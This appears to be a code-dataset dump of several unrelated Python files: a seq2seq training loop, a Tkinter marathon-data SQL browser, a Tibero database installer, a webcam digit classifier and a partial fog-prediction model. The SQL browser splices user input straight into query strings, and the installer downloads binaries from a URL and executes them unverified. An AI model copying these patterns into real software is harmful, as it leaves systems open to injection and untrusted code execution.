BatchGenerator(vocab_path=vocab_path, train_batch_size=train_batch_size, eval_batch_size=eval_batch_size, test_batch_size=test_batch_size)\ntask = 'translation'\n\nchunk_length = 32\n\ntrain_losses_av_mean = {}\ntrain_accs_av_mean = {}\n\ntrain_losses_pav_av_mean = {}\ntrain_accs_pav_av_mean = {}\n\n#eval_losses_av_mean = {}\n#eval_accs_av_mean = {}\n\ntrain_losses_pav_av_std = {}\ntrain_accs_pav_av_std = {}\n\ntrain_losses_av_std = {}\ntrain_accs_av_std = {}\n\nuse_masked_loss = True\nif use_masked_loss:\n loss_function = masked_cross_entropy\nelse:\n loss_function = nn.CrossEntropyLoss()\n\nvocab_size_encoder = len(bg.vocab.src)\nvocab_size_decoder = len(bg.vocab.tgt)\n\nnum_runs = 1\n\n#num_steps = 60000\n#print_skip = 50\n#save_per_step = 10000\nnum_steps = 5000\nprint_skip = 100\nsave_per_step = 1000\n\ntrain_losses = []\ntrain_accs = []\n\neval_losses = []\neval_accs = []\n\nNOT_AVAILABLE = 'NA'\n\nfeed_mode = 'gumbel-st'\ntf_ratio_range = (0.0, 0.0)\nfeed_baseline = 'argmax'\nif feed_mode != 'sampling':\n feed_baseline = NOT_AVAILABLE\nsoftmax_t_range = (1.0, 0.01)\nif feed_mode in ['argmax', 'sampling']:\n softmax_t_range = NOT_AVAILABLE\nbaseline_feed_mode = None\nif feed_baseline == 'argmax':\n baseline_feed_mode = 'argmax'\nattention_mode = 'hard'\nattention_baseline = 'argmax'\nif attention_mode != 'hard':\n attention_baseline = NOT_AVAILABLE\nbaseline_attention_mode = None\nif attention_baseline == 'argmax':\n baseline_attention_mode = 'argmax'\n\nmode_name = 'feed=' + feed_mode + '__tf_ratio=' + str(tf_ratio_range) + '__softmax_t=' + str(softmax_t_range) + '__feed_baseline=' + feed_baseline + '__attn=' + attention_mode + '__attn_baseline=' + attention_baseline\n\ndo_eval = True\ndo_print = 
False\n\nav_advantage = None\nstd_advantage = None\n\ngrad_norms = None\n\n#train_batch_gen, eval_batch_gen = get_data_generators(\n# train_batch_size, chunk_length, eval_batch_size\n#)\n\nwith open('data/fasttext/my_de_emb', 'rb') as f:\n de_emb = pickle.load(f)\n\nwith open('data/fasttext/my_en_emb', 'rb') as f:\n en_emb = pickle.load(f)\n\nmodel_params = {\n 'vocab_size_encoder': vocab_size_encoder,\n 'vocab_size_decoder': vocab_size_decoder,\n 'enc_pre_emb': de_emb,\n 'dec_pre_emb': en_emb,\n 'embed_dim': 128,\n 'hidden_size': 256\n}\n\nimport os\nimport pickle\n\nsave_path = './saved_models/' + mode_name\nif not os.path.exists(save_path):\n os.makedirs(save_path)\nwrite_path = './output/' + mode_name\nif not os.path.exists(write_path):\n os.makedirs(write_path)\n\n# %% TRAINING\nprint(mode_name)\nfor run in range(num_runs):\n print('Run', run)\n print()\n train_losses.append([])\n train_accs.append([])\n cum_train_loss = 0\n cum_train_acc = 0\n\n train_av_loss = 0\n batch_av_train_av_loss = 0\n\n eval_losses.append([])\n eval_accs.append([])\n cum_eval_loss = 0\n cum_eval_acc = 0\n cum_eval_bleu = 0\n\n global_start_time = time()\n last_print_time = global_start_time\n model = CUDA_wrapper(\n Seq2SeqModel(\n **model_params,\n feed_mode=feed_mode, \n baseline_feed_mode=baseline_feed_mode,\n attention_mode=attention_mode, \n baseline_attention_mode = baseline_attention_mode\n )\n )\n\n av_advantage = []\n std_advantage = []\n\n grad_norms = []\n grad_norms_biased = []\n\n init_lr = 0.001\n lr = init_lr\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr)\n\n for step in range(num_steps):\n if softmax_t_range != NOT_AVAILABLE:\n softmax_t = softmax_t_range[0] * (softmax_t_range[1] / softmax_t_range[0]) ** (step / num_steps)\n else:\n softmax_t = 0.0\n tf_ratio = tf_ratio_range[0] + (tf_ratio_range[1] - tf_ratio_range[0]) * (step / num_steps)\n\n chunk_batch_torch, tgt_batch_torch, tgt_len = bg.next_train()\n #print(chunk_batch_torch.size())\n #print(tgt_batch_torch.size())\n true_train_batch_size, true_chunk_length = chunk_batch_torch.size()\n true_train_batch_size, true_tgt_length = tgt_batch_torch.size()\n\n (unscaled_logits, outputs), \\\n (unscaled_logits_feed_baseline, outputs_feed_baseline), \\\n (unscaled_logits_attn_baseline, outputs_attn_baseline) = model(\n chunk_batch_torch, tgt_batch_torch,\n softmax_temperature=softmax_t,\n teacher_forcing_ratio=tf_ratio\n )\n \n if use_masked_loss:\n # unscaled_logits.data.shape\n # rev_chunk_batch.data.shape\n # print('Check (batch, max_len, num_classes) :', unscaled_logits.data.shape)\n # print('Check2 (batch, max_len): ', tgt_batch.data.shape)\n train_loss = loss_function(unscaled_logits, tgt_batch_torch, tgt_len)\n else:\n train_loss = loss_function(unscaled_logits.view(-1, vocab_size_decoder), tgt_batch_torch.view(-1))\n \n train_acc = torch.mean(torch.eq(outputs, tgt_batch_torch).float())\n \n if feed_baseline != NOT_AVAILABLE:\n if feed_baseline == 'no-reinforce':\n for dec_feed in model.decoder.dec_feeds:\n dec_feed.reinforce(\n CUDA_wrapper(torch.zeros(true_train_batch_size, 1))\n )\n elif feed_baseline == 'argmax':\n tgt_batch_torch_one_hot = CUDA_wrapper(\n torch.zeros(\n true_train_batch_size, true_tgt_length, vocab_size_decoder\n )\n )\n tgt_batch_torch_one_hot.scatter_(\n 2, tgt_batch_torch.data.view(true_train_batch_size, true_tgt_length, 1), 1\n )\n elemwise_train_loss = (-1) * F.log_softmax(\n unscaled_logits.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, 
true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n elemwise_train_loss_feed_baseline = (-1) * F.log_softmax(\n unscaled_logits_feed_baseline.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n normed_elemwise_advantage = (\n (elemwise_train_loss_feed_baseline - elemwise_train_loss) /\n (true_train_batch_size * true_tgt_length)\n )\n sum_normed_elemwise_advantage = torch.sum(\n normed_elemwise_advantage, dim=1\n )\n cumsum_normed_elemwise_advantage = torch.cumsum(\n normed_elemwise_advantage, dim=1\n )\n for t, dec_feed in enumerate(model.decoder.dec_feeds):\n dec_feed.reinforce(\n (sum_normed_elemwise_advantage - cumsum_normed_elemwise_advantage[:, t]).view(true_train_batch_size, 1)\n )\n\n av_advantage.append(torch.mean(elemwise_train_loss_feed_baseline - elemwise_train_loss, dim=0).cpu().numpy())\n std_advantage.append(torch.std(elemwise_train_loss_feed_baseline - elemwise_train_loss, dim=0).cpu().numpy())\n else:\n raise ValueError('Unknown feed_baseline: {}'.format(feed_baseline))\n\n if attention_baseline != NOT_AVAILABLE:\n if attention_baseline == 'argmax':\n tgt_batch_torch_one_hot = CUDA_wrapper(\n torch.zeros(\n true_train_batch_size, true_tgt_length, vocab_size_decoder\n )\n )\n tgt_batch_torch_one_hot.scatter_(\n 2, tgt_batch_torch.data.view(true_train_batch_size, true_tgt_length, 1), 1\n )\n elemwise_train_loss = (-1) * F.log_softmax(\n unscaled_logits.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n elemwise_train_loss_attn_baseline = (-1) * F.log_softmax(\n unscaled_logits_attn_baseline.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n normed_elemwise_advantage = (\n (elemwise_train_loss_attn_baseline - elemwise_train_loss) /\n (true_train_batch_size * true_tgt_length)\n )\n sum_normed_elemwise_advantage = torch.sum(\n normed_elemwise_advantage, dim=1\n )\n cumsum_normed_elemwise_advantage = torch.cumsum(\n normed_elemwise_advantage, dim=1\n )\n for t, attn_idx in enumerate(model.decoder.attention_idx):\n attn_idx.reinforce(\n (sum_normed_elemwise_advantage - cumsum_normed_elemwise_advantage[:, t]).view(true_train_batch_size, 1)\n )\n\n else:\n raise ValueError('Unknown attention_baseline: {}'.format(attention_baseline))\n\n optimizer.zero_grad()\n train_loss.backward()\n nn.utils.clip_grad_norm(model.parameters(), max_norm=4)\n optimizer.step()\n train_losses[-1].append(train_loss.data.cpu().numpy().mean())\n train_accs[-1].append(train_acc.data.cpu().numpy().mean())\n\n cum_train_loss += train_losses[-1][-1]\n cum_train_acc += train_accs[-1][-1]\n if do_eval:\n chunk_batch_torch, tgt_batch_torch, tgt_len = bg.next_eval()\n\n (unscaled_logits, outputs), \\\n (unscaled_logits_feed_baseline, outputs_feed_baseline), \\\n (unscaled_logits_attn_baseline, outputs_attn_baseline) = model(\n chunk_batch_torch, tgt_batch_torch,\n work_mode='test'\n )\n if use_masked_loss:\n eval_loss = loss_function(unscaled_logits, tgt_batch_torch, tgt_len)\n else:\n eval_loss = loss_function(\n unscaled_logits.view(-1, vocab_size_decoder),\n tgt_batch_torch.view(-1)\n )\n eval_acc = 
torch.mean(torch.eq(outputs[:, :tgt_batch_torch.size(1)].contiguous(), tgt_batch_torch).float())\n\n            eval_losses[-1].append(eval_loss.data.cpu().numpy().mean())\n            eval_accs[-1].append(eval_acc.data.cpu().numpy().mean())\n\n            cum_eval_loss += eval_losses[-1][-1]\n            cum_eval_bleu += bleu_score(\n                unscaled_logits, outputs, tgt_batch_torch, bg.vocab.tgt.id2word\n            )\n            cum_eval_acc += eval_accs[-1][-1]\n\n        # Print:\n        if (step + 1) % print_skip == 0:\n            print('Step', step + 1)\n\n            print('softmax temperature: {:.2f}'.format(softmax_t))\n            print('teacher-forcing ratio: {:.2f}'.format(tf_ratio))\n\n            print('Train loss: {:.2f}; train accuracy: {:.2f}'.format(\n                cum_train_loss / print_skip, cum_train_acc / print_skip\n            ))\n            cum_train_loss = 0\n            cum_train_acc = 0\n\n            if do_eval:\n                if task=='translation':\n                    print('Eval loss: {:.2f}; eval accuracy: {:.2f}; eval bleu: {:.2f}'.format(\n                        cum_eval_loss / print_skip, cum_eval_acc / print_skip, cum_eval_bleu / print_skip\n                    ))\n                    cum_eval_loss = 0\n                    cum_eval_acc = 0\n                    cum_eval_bleu = 0\n\n                    if do_print:\n                        outputs_np = outputs.data.cpu().numpy()\n                        cur_decode_batch_size = min(\n                            decode_batch_size,\n                            min(len(tgt_batch_torch), len(outputs_np))\n                        )\n                        for i in range(cur_decode_batch_size):\n                            print('{}\\n| vs |\\n{}'.format(\n                                ' '.join([bg.vocab.tgt.id2word[k.data[0]] for k in tgt_batch_torch[i]]),\n                                ' '.join([bg.vocab.tgt.id2word[k] for k in outputs_np[i]])\n                            ))\n\n                else:\n                    raise ValueError('Unknown task: {}'.format(task))\n\n            print('{:.2f}s from last print'.format(time() - last_print_time))\n            last_print_time = time()\n            print()\n        if (step + 1) % save_per_step == 0:\n            print('perform saving the model:')\n            torch.save(model.state_dict(), save_path + "/step=" + str(step))\n            print('model saved')\n\n    eval_losses_mean = np.mean(eval_losses, axis=0)\n    eval_losses_std = np.std(eval_losses, axis=0)\n\n    eval_accs_mean = np.mean(eval_accs, axis=0)\n    eval_accs_std = np.std(eval_accs, axis=0)\n\n    train_losses_mean = np.mean(train_losses, axis=0)\n    train_losses_std = np.std(train_losses, axis=0)\n\n    train_accs_mean = np.mean(train_accs, axis=0)\n    train_accs_std = np.std(train_accs, axis=0)\n\n    for name in ['train_losses', 'train_accs', 'eval_losses', 'eval_accs']:\n        for suffix in ['', '_mean', '_std']:\n            with open(write_path + '/' + name + suffix + '.dat', 'wb') as f:\n                pickle.dump(eval(name + suffix), f)\n    print('output written')\n","repo_name":"varenick/seq2seq","sub_path":"notebook.py","file_name":"notebook.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86372688150","text":"import pyodbc\nimport pandas as pd\nimport tkinter as tk\n\nfrom tkinter import *\nfrom tkinter import ttk #Import all the functions that tkinter contains\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\n\n# First load the table to work with so it can be passed to SQL\n\ncarreras=pd.read_csv('C:/Users/Manuel Gastelum/Clase 13/Tarea 14/Maraton NY completo.csv', \n                    engine='python') \ncarreras= carreras.fillna(value=0)\nLista_valores = carreras.values.tolist()\n\nfor inner_list in Lista_valores:\n\tinner_list[5] = round(inner_list[5],2)\n\n#print(Lista_valores)\ntuplas_lista = tuple(Lista_valores) \n#print(tuplas_lista)\n\nserver = 'VINDMGASTELUMTE\\MSSQLSERVER01'\nconexion = pyodbc.connect('DRIVER={SQL Server};SERVER='+server, autocommit=True)\n\n\ncursor = conexion.cursor()\ncursor.execute(\"IF NOT EXISTS(SELECT * FROM sys.databases WHERE name = 'Nueva') BEGIN CREATE DATABASE Nueva 
END\")\ncursor.execute(\"DROP DATABASE Nueva\") \ncursor.execute(\"CREATE DATABASE Nueva\") \nconexion.close()\n\n\nconexion = pyodbc.connect(driver='{SQL server}', host = server, database = \"Nueva\")\ncursor = conexion.cursor()\ncursor.execute(\"CREATE TABLE MaratonNY_Python (Corredor INT, place INT, gender VARCHAR(25), age INT, home VARCHAR(10), time FLOAT)\")\ncursor.executemany(\"INSERT INTO MaratonNY_Python VALUES(?,?,?,?,?,?)\", tuplas_lista)\ncursor.commit()\nconexion.close()\n\nclass General:\n\tdef __init__(self, raiz):\n\t\tself.genero = StringVar()\n\t\tself.label_genero = Label(raiz, text = \"Género\")\n\t\tself.label_genero.grid(column=0, row=0)\n\t\tself.genero = Combobox(raiz, values=('Female', 'Male'), width=5)\n\t\tself.genero.grid(column=0, row=1)\n\n\t\tself.origen = StringVar()\n\t\tself.label_origen = Label(raiz, text = \"Origen\")\n\t\tself.label_origen.grid(column=0, row=5)\n\t\tself.origen = Combobox(raiz, values=(\"GBR\", \"NY\", \"FRA\", \"MI\", \"IRL\", \"GER\", \"Otro\"), width=10)\n\t\tself.origen.grid(column=0,row=6)\n \n\t\tself.time = StringVar()\n\t\tself.label_time = Label(raiz, text = \"Tiempo\")\n\t\tself.label_time.grid(column=0, row=10)\n\t\tself.time = Combobox(raiz, values=(\"menos de 200 min\", \"entre 200 y 250 min\", \"entre 250 y 300 min\", \"más de 300 min\", \"NULL\"), width=10)\n\t\tself.time.grid(column=0,row=11)\n\n\t\t#Create the buttons\n\t\t#With command we tell it which function to execute\n\t\tself.boton_buscar= Button(raiz, text=\"Buscar\", command=self.buscar)\n\t\tself.boton_buscar.grid(column=0, row=30)\n\n\t\tself.boton_borrar=Button(raiz, text=\"Borrar\", command=self.borrar)\n\t\tself.boton_borrar.grid(column=0, row=40)\n\n\t\t#Table\n\t\tself.tabla=ttk.Treeview(raiz, column=(\"c1\", \"c2\", \"c3\", \"c4\"), show='headings', height=8)\n\t\tself.tabla.column(\"# 1\",anchor=CENTER, stretch=NO, width=100)\n\t\tself.tabla.heading(\"# 1\", text=\"Corredor\")\n\t\tself.tabla.column(\"# 2\", anchor=CENTER, stretch=NO)\n\t\tself.tabla.heading(\"# 2\", text=\"Género\")\n\t\tself.tabla.column(\"# 3\", anchor=CENTER, stretch=NO)\n\t\tself.tabla.heading(\"# 3\", text=\"Origen\")\n\t\tself.tabla.column(\"# 4\", anchor=CENTER, stretch=NO)\n\t\tself.tabla.heading(\"# 4\", text=\"Tiempo\") \n\t\tself.tabla.grid(column=0, row=50)\n \n\tdef buscar(self):\n\t\tself.tabla.delete(*self.tabla.get_children())\n\t\tserver = 'VINDMGASTELUMTE\\MSSQLSERVER01'\n\t\tbd = 'Nueva'\n\t\tgenero_valor = \"'\" + self.genero.get() + \"'\"\n\t\t#print(genero_valor)\n\n\t\torigen = \"'\" + self.origen.get() + \"'\"\n\t\ttime = \"'%\" + self.time.get().lower() + \"%'\"\n\n\t\tconexion = pyodbc.connect(driver='{SQL server}', host = server, database = bd)\n\t\t\n\n\t\t#Create a cursor to store the information in memory\n\t\tcursor = conexion.cursor()\n\t\tif self.origen.get()=='Otro':\n\t\t\tinstruccion = \"SELECT Corredor, gender, home, time FROM MaratonNY_Python WHERE gender= \" + genero_valor + \" AND home <> 'GBR' AND home <> 'NY' AND home <> 'FRA' AND home <> 'MI' AND home <> 'IRL' AND home <> 'GER'\"\n\t\telse:\n\t\t\tinstruccion = \"SELECT Corredor, gender, home, time FROM MaratonNY_Python WHERE gender= \" + genero_valor + \" AND home = \" + origen\n\t\tif self.time.get() == \"menos de 200 min\":\n\t\t\tinstruccion = instruccion + \" AND time < 200\"\n\t\telif self.time.get() == \"entre 200 y 250 min\":\n\t\t\tinstruccion = instruccion + \" AND time < 250 AND time > 200\"\n\t\telif self.time.get() == \"entre 250 y 300 
min\":\n\t\t\tinstruccion = instruccion + \" AND time < 300 AND time > 250\"\n\t\telif self.time.get() == \"más de 300 min\":\n\t\t\tinstruccion = instruccion + \" AND time > 300\"\n\t\tcursor.execute(instruccion)\n\t\tdatos_clientes = cursor.fetchall()\n\t\tprint(datos_clientes)\n\t\tconexion.commit()\n\n\n\t\t#Make sure to close the connection\n\t\tconexion.close()\n \n\t\t#Send the information to the table\n\t\tfor row in datos_clientes:\n\t\t\tself.tabla.insert('', 'end', values=((row[0],row[1],row[2],row[3])))\n\t\t#messagebox.showinfo(\"Resultados\", datos_clientes)\n\n\t#def desplegar_resultados(self):\n\n\tdef borrar(self):\n\t\tself.tabla.delete(*self.tabla.get_children())\n\t\tself.genero.set(\"\")\n\t\tself.origen.set(\"\")\n\n\n\n\n\n#Create the object that will be the root of the application\nraiz = Tk()\n#Add a title\nraiz.title(\"Filtrador de tabla de corredores\")\n#Decide whether its size can be changed\nraiz.resizable(1,1)\n#Assign a logo\nraiz.iconbitmap('objetos.ico')\n#Assign a cursor type, a background color and a border to the root\nraiz.config(bd=8)\nraiz.config(relief=\"ridge\")\nestructura = General(raiz)\n\nraiz.mainloop()","repo_name":"m5991/Tarea-14---Programacion-1","sub_path":"Tarea Clase 14 - MGR.py","file_name":"Tarea Clase 14 - MGR.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11220822530","text":"#!/usr/bin/env python2\n\nimport urllib\nimport os\nimport logging\n\nlogging.basicConfig(filename='/dev/stdout', level=logging.DEBUG, format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n\n\ndef logger_info(message):\n    logging.info('\\033[1;32m' + message + '\\033[0m')\n\nurl = \"https://github.com/miglesiassarria/tibero/raw/master/installation/Tib6.bin.00\"\nruta_base = \"tibero\"\ndestino = ruta_base + \"/Tib6.bin.00\"\nexiste = ruta_base + \"/tibero6\"\ninstalador = ruta_base + \"/installer.bin\"\ntbhome = os.environ.get(\"TB_HOME\")\n\n\nif os.path.exists(existe):\n    logger_info(\"TIBERO IS ALREADY INSTALLED\")\n    bd_list = os.listdir(tbhome)\n\n    for name in bd_list:\n        if name[(len(name)-5):len(name)] == \".conf\":\n            database_id = name[0:len(name)-5]\n            os.environ[\"TB_SID\"] = database_id\n            os.system(\"tbdown clean\")\n            os.system(\"tbboot\")\n\n\nelse:\n    logger_info(\"INSTALLING TIBERO\")\n    for i in range(5):\n        urllib.urlretrieve(url + str(i+1), filename=destino + str(i+1))\n\n    os.system(\"cat \" + destino + \"* > \" + ruta_base + \"/installer.bin\")\n    os.system(\"chmod +x \" + ruta_base + \"/installer.bin\")\n    os.system(instalador + \" -f /solutions/installvariables.properties -i silent\")\n    os.system(\"chmod +x /tibero/tibero6/client/bin/install.sh\")\n    os.system(\"mkdir \" + ruta_base + \"/scripts\")\n    os.system(\"mkdir \" + ruta_base + \"/dbrepo\")\n    os.system(\"touch \" + ruta_base + \"/dbrepo/dbs.ini\")\n\n    logger_info(\"Preparing database scripts\")\n    os.system(\"cp /solutions/scripts/*.sh /tibero/\")\n    os.system(\"cp /solutions/scripts/*.py /tibero/scripts\")\n    os.system(\"rm \" + ruta_base + \"/*bin*\")\n\n    logger_info(\"INSTALLATION FINISHED !!!ENJOY IT!!!\")\n\n\nos.system(\"/bin/bash\")","repo_name":"nfqSolutionsDocker/tibero","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4091878682","text":"import cv2\nimport matplotlib.pyplot as plt\nfrom 
keras.models import load_model\nimport numpy as np\n\ncv2.namedWindow(\"Press space to capture\")\nvc = cv2.VideoCapture(0)\n\nif vc.isOpened(): # try to get the first frame\n    rval, frame = vc.read()\nelse:\n    rval = False\n\n# print(grayscale_image[0][0][:])\n\nwhile rval:\n    cv2.imshow(\"Press space to capture\", frame)\n    rval, frame = vc.read()\n    key = cv2.waitKey(20)\n    if key == 32: # capture the current frame on SPACE\n        break\n\nvc.release()\ncv2.destroyWindow(\"Press space to capture\")\n\ngrayscale_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY).reshape(480, 640)\n\n# invert pixel intensities (255 - value) before resizing\nfor i in range(len(grayscale_image)):\n    for j in range(len(grayscale_image[0])):\n        grayscale_image[i][j] = 255 - grayscale_image[i][j]\n\n# the third positional argument of cv2.resize is dst, so the\n# interpolation flag has to be passed by keyword\nresized_gray_image = cv2.resize(grayscale_image, (28, 28), interpolation=cv2.INTER_LINEAR)\n\nplt.imshow(resized_gray_image)\nplt.show()\n\nresized_gray_image = resized_gray_image.reshape(1, 28, 28, 1)\n\nld_model = load_model('data/cnn.keras')\nprediction = ld_model.predict(resized_gray_image)\n\nprint(prediction)\nprint(np.argmax(prediction))\n","repo_name":"jmotamarry/Machine-Learning","sub_path":"camera_model_integration.py","file_name":"camera_model_integration.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73613591847","text":"import torch\nimport numpy as np\nimport pandas as pd\nfrom math import sqrt\nimport torch.optim as optim\nimport torch.nn as nn\nfrom sklearn.metrics import (mean_squared_error,\n                             confusion_matrix,\n                             classification_report,\n                             f1_score,\n                             precision_score,\n                             recall_score)\n\nfrom imblearn.over_sampling import SMOTE\n\nfrom datasets.occur.split_train_test import fog_data_train_test_split\nfrom datasets.occur.util import (convert_torch_type,\n                                 binary_acc)\n\nfrom model.occdnn import Deep_Neural_Network_Target_Existence\n\n\n\ndef change_batch_size(vis_limit_num, all_parameters_list, i):\n    if vis_limit_num == 1000:\n        batch_size = 128\n        temp_list = list(all_parameters_list[i])\n        temp_list[4] = batch_size\n        all_parameters_list[i] = tuple(temp_list)\n        print('batch_size : ', batch_size)\n        return all_parameters_list\n\n    elif vis_limit_num == 100:\n        batch_size = 16\n        temp_list = list(all_parameters_list[i])\n        temp_list[4] = batch_size\n        all_parameters_list[i] = tuple(temp_list)\n        return all_parameters_list\n\n    elif vis_limit_num == 500:\n        batch_size = 30\n        temp_list = list(all_parameters_list[i])\n        temp_list[4] = batch_size\n        all_parameters_list[i] = tuple(temp_list)\n        return all_parameters_list\n\n    elif vis_limit_num == 5000:\n        batch_size = 256\n        temp_list = list(all_parameters_list[i])\n        temp_list[4] = batch_size\n        all_parameters_list[i] = tuple(temp_list)\n        print('batch_size : ', batch_size)\n        return all_parameters_list\n\n    elif vis_limit_num == 10000:\n        batch_size = 512\n        temp_list = list(all_parameters_list[i])\n        temp_list[4] = batch_size\n        all_parameters_list[i] = tuple(temp_list)\n        print('batch_size : ', batch_size)\n        return all_parameters_list\n\n    elif vis_limit_num == 30000:\n        batch_size = 768\n        temp_list = list(all_parameters_list[i])\n        temp_list[4] = batch_size\n        all_parameters_list[i] = tuple(temp_list)\n        print('batch_size : ', batch_size)\n        return all_parameters_list\n\n    # fall back: leave the parameter list unchanged for any other visibility\n    # limit instead of implicitly returning None\n    return all_parameters_list\n\n\n\ndef return_precision_recall_f1(true_value, predict_value, pos_label = 1):\n    precision = precision_score(true_value.squeeze(), predict_value.squeeze(), pos_label=pos_label)\n    recall = recall_score(true_value.squeeze(), predict_value.squeeze(), pos_label=pos_label)\n    f1_score_value = f1_score(true_value.squeeze(), 
predict_value.squeeze(), pos_label = pos_label)\n rmse = sqrt(mean_squared_error(true_value.squeeze(), predict_value.squeeze()))\n return precision, recall, f1_score_value, rmse\n\n\n\n\ndef run_model(data_path, save_path, pre_data_list, obs_point, vis_limit_list, all_parameters_list):\n for vis_limit_num in vis_limit_list:\n obs_save_path = save_path + str(obs_point) + \"\\\\\" + str(vis_limit_num)\n\n train_x, test_x, train_y, test_y = fog_data_train_test_split(data_path, save_path, obs_point, pre_data_list,\n vis_limit_num, 'Fog_30', 0.3)\n\n print(train_x.shape, train_y.shape, test_x.shape, test_y.shape)\n\n X_train_over, y_train_over = SMOTE(random_state=0).fit_resample(train_x,\n train_y) # smote.fit_sample(train_x,train_y)\n print('Before applying unbalanced data algorithms, Learning Feature/Label Dataset: ', train_x.shape, train_y.shape)\n print('After applying unbalanced data algorithms, Learning Feature/Label Dataset: ', X_train_over.shape, y_train_over.shape)\n print('After applying unbalanced data algorithms, Label Value Distribution: \\n', pd.Series(y_train_over).value_counts())\n\n torch_train_x, torch_train_y, torch_test_x, torch_test_y = convert_torch_type(X_train_over, y_train_over,\n test_x, test_y)\n torch_train_x = torch_train_x.reshape([torch_train_x.shape[0], torch_train_x.shape[1]])\n torch_test_x = torch_test_x.reshape([torch_test_x.shape[0], torch_test_x.shape[1]])\n torch_train_y = torch_train_y.reshape([torch_train_y.shape[0], 1])\n torch_test_y = torch_test_y.reshape([torch_test_y.shape[0], 1])\n print(torch_train_x.shape, torch_train_y.shape, torch_test_x.shape, torch_test_y.shape)\n\n test_nonoccurrence_list = []\n test_occurrence_list = []\n test_occurrence_precision_list = []\n\n train_nonoccurrence_list = []\n train_occurrence_list = []\n train_occurrence_precision_list = []\n\n train_rmse_list = []\n test_rmse_list = []\n\n train_f1_score_list = []\n test_f1_score_list = []\n\n for i in range(len(all_parameters_list)):\n print(\"Progress : {:.2f}%\".format(((i + 1) / len(all_parameters_list)) * 100))\n num_unit_1, num_unit_2, num_unit_3, lr, batch_size, n_epochs, drop_out = all_parameters_list[i][0], \\\n all_parameters_list[i][1], \\\n all_parameters_list[i][2], \\\n all_parameters_list[i][3], \\\n all_parameters_list[i][4], \\\n all_parameters_list[i][5], \\\n all_parameters_list[i][6],\n\n all_parameters_list = change_batch_size(vis_limit_num, all_parameters_list, i)\n\n print(torch_train_x.shape, torch_train_y.shape, torch_test_x.shape, torch_test_y.shape)\n train = torch.utils.data.TensorDataset(torch_train_x, torch_train_y)\n test = torch.utils.data.TensorDataset(torch_test_x, torch_test_y)\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n test_loader = torch.utils.data.DataLoader(test, batch_size=batch_size, shuffle=False)\n seed = 1\n lr = lr\n momentum = 0.5\n no_cuda = False\n batch_size = batch_size\n torch.manual_seed(seed)\n use_cuda = not no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n network = Deep_Neural_Network_Target_Existence(num_unit_1=num_unit_1, num_unit_2=num_unit_2,\n num_unit_3=num_unit_3, input_num=torch_train_x.shape[1],\n drop_out=drop_out).to(device)\n optimizer = optim.Adam(network.parameters(), lr=lr)\n criterion = nn.BCEWithLogitsLoss(reduction='mean')\n\n for epoch in range(n_epochs):\n epoch_loss = 0\n epoch_acc = 0\n # network.train()\n for batch_index, (x_batch, y_batch) in enumerate(train_loader):\n x_batch, y_batch = 
x_batch.to(device), y_batch.to(device)\n optimizer.zero_grad()\n # print(x_batch.shape)\n y_pred = network(x_batch)\n loss = criterion(y_pred, y_batch)\n # print(y_pred.shape)\n acc = binary_acc(y_pred, y_batch)\n\n loss.backward()\n optimizer.step()\n\n epoch_loss += loss.item()\n epoch_acc += acc.item()\n\n # Test Loss\n test_epoch_loss = 0\n test_epoch_acc = 0\n for batch_index, (x_batch, y_batch) in enumerate(test_loader):\n x_batch, y_batch = x_batch.to(device), y_batch.to(device)\n y_pred = network(x_batch)\n test_loss = criterion(y_pred, y_batch)\n test_acc = binary_acc(y_pred, y_batch)\n test_epoch_loss += test_loss.item()\n test_epoch_acc += test_acc.item()\n\n # append test,train loss to list\n if (epoch % 100 == 0) | (epoch == n_epochs-1):\n test_predict = torch.round(torch.sigmoid(\n network(torch.tensor(torch_test_x, dtype=torch.float).cuda()).clone().detach())).cpu().detach().numpy().squeeze()\n\n test_occurrence_accuracy, test_occurrence_precision, test_f1_score, test_rmse = return_precision_recall_f1(test_predict, torch_test_y)\n\n test_nonoccurrence_accuracy, test_nonoccurrence_precision, test_nonf1_score, test_rmse = return_precision_recall_f1(test_predict, torch_test_y, 0)\n\n print(\"Train Epoch : {} Train Loss: {:.6f} Train Acc: {:.3f} Test Loss: {:.6f} Test Acc: {:.3f}\".\n format(epoch, epoch_loss, epoch_acc / len(train_loader), test_epoch_loss,\n test_epoch_acc / len(test_loader)))\n\n print(\"(TEST) Occurrence Accuracy : {:.3f} / Occurrence Precision : {:.3f} / F1 Score : {:.3f} \".\n format(test_occurrence_accuracy, test_occurrence_precision, test_f1_score))\n\n print(\"(TEST) Nonoccurrence Accuracy : {:.3f} / Nonoccurrence Precision : {:.3f} / Nonoccurrence F1 Score : {:.3f}\\n \".\n format(test_nonoccurrence_accuracy, test_nonoccurrence_precision, test_nonf1_score))\n\n\n # test_predict\n test_predict = torch.round(torch.sigmoid(\n network(torch.tensor(torch_test_x, dtype=torch.float).cuda()).clone().detach())).cpu().detach().numpy().squeeze()\n\n 